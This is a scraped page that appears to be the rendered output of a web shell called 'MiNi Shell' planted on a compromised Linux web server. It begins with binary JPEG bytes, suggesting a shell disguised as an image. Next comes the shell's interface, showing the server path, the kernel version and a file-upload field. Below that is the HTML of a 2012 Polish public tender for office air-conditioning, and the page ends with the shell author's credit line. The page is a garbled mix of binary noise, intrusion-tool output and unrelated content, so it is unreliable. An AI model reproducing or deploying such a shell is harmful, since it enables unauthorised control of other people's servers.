JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120920/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120920/358368-N-2012.html

<p class="kh_header"><b>Wrocław: Wykonanie systemu klimatyzacji części pomieszczeń budynku biurowego w siedzibie Oddziału Państwowej Inspekcji Pracy w Legnicy ul. Lotnicza 15, 59-220 Legnica.</b><br>
<b>Numer ogłoszenia: 358368 - 2012; data zamieszczenia: 20.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Okręgowy Inspektorat Pracy we Wrocławiu , ul. Zielonego Dębu 22, 51-621 Wrocław, woj. dolnośląskie, tel. 71 37 10 468, faks 71 37 10 470.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie systemu klimatyzacji części pomieszczeń budynku biurowego w siedzibie Oddziału Państwowej Inspekcji Pracy w Legnicy ul. Lotnicza 15, 59-220 Legnica..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie systemu klimatyzacji części pomieszczeń budynku biurowego w siedzibie Oddziału Państwowej Inspekcji Pracy przy ul. Lotniczej 15, 59-220 Legnica.
1.1 Budynek Państwowej Inspekcji Pracy Oddział w Legnicy jest obiektem wolnostojącym, zrealizowanym w technologii tradycyjnej, o trzech kondygnacjach nadziemnych, niepodpiwniczony. 
1.2 Rodzaj konstrukcji obiektu budowlanego:
a) fundamenty - murowane; b) ściany - murowane z cegły ceramicznej; c) stropy - drewniane ocieplone żużlem; d) dach - stropodach drewniany jednospadowy; e) schody - drewniane zabiegowe. 2. Wykonanie przedmiotu zmówienia stanowi dostawę, montaż i uruchomienie instalacji klimatyzacji  w następującym zakresie rzeczowym: a) II piętro pomieszczenia: serwerownia - wejście przez pokój 25 (zgodnie z rysunkiem wg projektu - Rzut II piętra - nr 3/4)
urządzenie ścienne typ inwerter, min. moc chłodnicza 3,4 kW + zestaw do pracy w niskich temperaturach w trybie chłodzenia, klasa energetyczna A, współczynnik EER nie mniejszy niż 3,6. b) II piętro pomieszczenia: pokój 22 (zgodnie z rysunkiem wg projektu -Rzut II piętra- nr 3/8) , pokój 23 (zgodnie z rysunkiem wg projektu -Rzut II piętra- nr 3/7) oraz pokój 24 (zgodnie z rysunkiem wg projektu -Rzut II piętra- nr 3/6). Jednostki ścienne odpowiednio: Pokój 24 (3/6) minimalna moc chłodnicza 2,0 kW, max. poziom hałasu dla biegu najniższego nie więcej niż 23 dB, masa nie większa niż 11kg. Pokoje 23 (3/7) oraz 22 (3/8) minimalna moc chłodnicza 3,5 kW, max. poziomu hałasu dla biegu najniższego nie więcej niż 23 dB, masa nie większa niż 11 kg. Jednostka zewnętrzna moc chłodnicza nie mniejsza niż 8 kW, poziom głośności w trybie chłodzenia nie większy niż 52 dB, masa urządzenia zewnętrznego nie większa niż 70 kg. c) II piętro: pokój 21 -Sala Konferencyjna-Narad (zgodnie z rysunkiem wg projektu -Rzut II piętra- nr 3/9) urządzenie kasetonowe o min mocy chłodniczej 7,0 kW,
typ inwertor, max. poziom hałasu dla biegu najniższego nie więcej niż 32 dB,
masa nie większa niż 20 kg. Jednostka zewnętrzna max. poziom hałasu w trybie chłodzenia nie więcej niż 53 dB, masa nie większa niż 50kg. d) poziom hałasu jednostki wewnętrznej pomiar w odległości 1m w warunkach komory akustycznej na max. biegu wentylatora nie większy niż 41,0 dB, e) klasa energetyczna min. C, EER nie mniejsze niż 2,80; f) czynnik chłodniczy R-410A, g) wykonanie odprowadzania skroplin z jednostek wewnętrznych w korytkach maskujących do kanalizacji,
h) instalacja elektroenergetyczna zasilająca wszystkie w/w klimatyzatory, obudowa płytą gipsowo-kartonową klimatyzatora kasetonowego. 3. Urządzenia - klimatyzatory oraz pozostałe materiały winny mieć dokumenty dopuszczenia do stosowania w Polsce. Wszystkie urządzenia mają być jednego producenta. Zaoferowane urządzenia muszą być oryginalne, fabrycznie nowe, wyprodukowane w roku 2011, nie noszące śladów zużycia. 4. Przykład doboru urządzeń:
Serwerownia: ASYG12LE/AOYG12LE z możliwością pracy w trybie chłodzenia w okresie zimowym lub równoważny; Biura: 1XASYG07LU, 2xASYG12LU jednostka zewnętrzna AOYG30LAT4 lub równoważny; Sala konferencyjna: AUYF24LB/AOYA24LA lub równoważny. 5. Roboty montażowe należy wykonywać przy użyciu elektronarzędzi sprawnych i dopuszczonych do eksploatacji, drabin montażowych atestowanych. 6. Transport klimatyzatorów należy wykonywać w fabrycznych opakowaniach. Pozostałe elementy - materiały transportować w sposób zabezpieczających przed ich uszkodzeniem. Transport obejmuje drogę pomiędzy magazynem dystrybutora a placem budowy. 7. Montaż przewodów i urządzeń klimatyzacji winien być wykonany na przygotowanych podłożach jako rozwiązanie docelowe (nie dopuszcza się stosowania rozwiązań prowizorycznych, tymczasowych). 8. Klimatyzatory montować zgodnie z Dokumentacją Techniczno-Ruchową urządzenia. 9. Uruchomienie klimatyzatorów powinna przeprowadzić firma posiadająca autoryzację producenta zastosowanego urządzenia. 10. Typ klimatyzatorów winien być dostarczony zgodnie z zamówieniem. Klimatyzatory powinny posiadać dokumenty: DTR, kartę gwarancyjną, deklarację zgodności wyrobu. 11. Wymagany okres gwarancji - co najmniej trzy lata, poczynając od daty odbioru końcowego. W przypadku stwierdzenia przy odbiorze usterek - gwarancja biegnie od daty usunięcia tych usterek. 12. Wykonawca do ofert załączy wzór karty gwarancyjnej, potwierdzającej okres gwarancji (kserokopia) oraz jej warunki. 13. W ramach gwarancji Wykonawca zobowiązuje się do usuwania wszelkich usterek i wad będących następstwem montażu lub tkwiących w dostarczonych urządzeniach i materiałach wad fizycznych instalacji, jeżeli wady te ujawniają się w ciągu trwania okresu gwarancyjnego. 14. Wszelkie naprawy, serwisy i przeglądy w okresie gwarancji wykonywane będą w ramach ceny podpisanej umowy. 15. Gwarancją nie są objęte: - źródła światła,- części, które uległy normalnemu zużyciu, - wszelkie uszkodzenia, których przyczyna nie była związana z użytkowaniem zamontowanych urządzeń. 16. Realizacja przeglądów:
- przeglądy będą realizowane co 6 miesięcy licząc od daty odbioru końcowego
przedmiotu umowy, - przeglądy będą wykonywane w dni robocze.
17. Zakres przeglądów obejmuje: - sprawdzenie poprawności działania urządzeń klimatyzacyjnych i instalacji; - przeprowadzenie czynności kontrolnych urządzeń klimatyzacyjnych i instalacji; - wizualne sprawdzenie stanu technicznego urządzeń klimatyzacyjnych i instalacji; - potwierdzenie wykonanego przeglądu protokołem podpisanym przez Wykonawcę i Zamawiającego. 18. Wykonawca w terminie 30 dni przed przystąpieniem do wykonywania przeglądu przedłoży do akceptacji Zamawiającego harmonogram zawierający termin i zakres prowadzonego przeglądu.
19. Rurociągi winny posiadać świadectwa wyrobu. 20.Rurociągi łączące jednostki należy poddać powietrznej próbie szczelności na ciśnienie 4 bar przez 0,5 godziny.
21. Po zakończeniu montażu przewody elektryczne zasilające poszczególne urządzenia należy poddać badaniom stanu izolacji a urządzenia pomierzyć pod kątem skuteczności ochrony przeciwpożarowej. 22. Wykonawca powinien mieć zawartą umowę na utylizację czynnika chłodniczego przez podmiot uprawniony lub dokument potwierdzający uprawnienia do wykonywania obrotu i utylizacji czynnika chłodniczego zgodnie z ustawą o ochronie środowiska naturalnego. 23. Zamawiający udostępni, na pisemny wniosek zainteresowanego, rysunek wg projektu -Rzut II piętra-. 24. Wykonane roboty podlegają odbiorowi końcowemu (nie przewiduje się odbiorów częściowych). Instalacja powinna być przedstawiona do odbioru technicznego końcowego po spełnieniu następujących warunków:
- zakończenie wszelkich robót montażowych przy instalacji; - przeprowadzenie wszystkich badań przedodbiorowych z wynikiem pozytywnym; - przeszkolenie obsługi; - posiadanie kompletu dokumentów do odbioru (DTR, protokoły, atesty);
- oświadczenie kierownika robót. 25. Wykonawca zobowiązuje się do nieujawniania wszelkich powziętych informacji w trakcie realizacji umowy informacji dotyczących Oddziałów Państwowej Inspekcji Pracy w Legnicy, pod rygorem skutków prawnych.
26. Szczegółowy zakres i warunki realizacji zamówienia przedstawiają: specyfikacja techniczna wykonania i odbioru robót; przedmiar robót; projekt umowy; które stanowią załączniki do specyfikacji istotnych warunków zamówienia i są jej integralną częścią..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.33.12.30-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, Wykonawca wykonał minimum 2 zamówienia odpowiadającym przedmiotowi zamówienia określonemu w SIWZ, tj. polegające na wykonaniu systemu klimatyzacji, o wartości nie mniejszej niż 65 000,00 zł brutto dla każdego zamówienia; Doświadczenie Wykonawcy winno być udokumentowane w formie wykazu zamówień wykonanych określonego w pkt VII ust. 6 SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.   Dopuszcza się możliwość zmian postanowień zawartych w umowie w przypadku:
a)  zlecenia robót dodatkowych, uzupełniających lub zamiennych jeżeli terminy ich zlecenia, rodzaj lub zakres mają wpływ na pierwotny termin umowy;
b)  przerwy w realizacji robót powstałych w skutek przyczyn niezależnych od Wykonawcy i Zamawiającego;
c)  wstrzymania robót przez Zamawiającego albo przerw w wykonaniu robót powstałych z winy Zamawiającego a spowodowanych okolicznościami, których nie mógł przewidzieć w chwili zawarcia umowy, mających wpływ na prowadzenie i realizację robót;
d)   zmiany przepisów prawnych mających wpływ na cenę umowy, a w szczególności zmiany ustawowej podatku VAT, wprowadzenia akcyzy;
e) zmiany nazwy, adresu firmy, spowodowanej zmianą formy organizacyjno-prawnej, przekształceniem lub połączeniem z inną firmą;
f)   inne zmiany których nie można było przewidzieć w chwili zawarcia umowy.
2.   Wszelkie zmiany muszą być dokonane z zachowaniem przepisu art. 140 ust 1 pzp i art. 140 ust. 3 stanowiącego, że umowa podlega unieważnieniu w części wykraczającej poza   określenie przedmiotu umowy zawartego w SIWZ.
3.  Warunkiem zmiany umowy będzie udokumentowany pisemny wniosek Wnioskodawcy lub Zamawiającego, a jej zmiana może nastąpić w przypadku, gdy jej wprowadzenie jest konieczne dla prawidłowej realizacji zamówienia i strony umowy wyrażają zgodę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.pip.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Państwowa Inspekcja Pracy Okręgowy Inspektorat Pracy ul. Zielonego Dębu 22, 51-621 Wrocław oraz w Oddziałach Okręgowego Inspektoratu Pracy w Legnicy, Kłodzku, Jeleniej Górze i Wałbrzychu..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.10.2012 godzina 10:00, miejsce: Okręgowy Inspektorat Pracy Oddział w Legnicy ul. Lotnicza 15, 59-220 Legnica - Sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com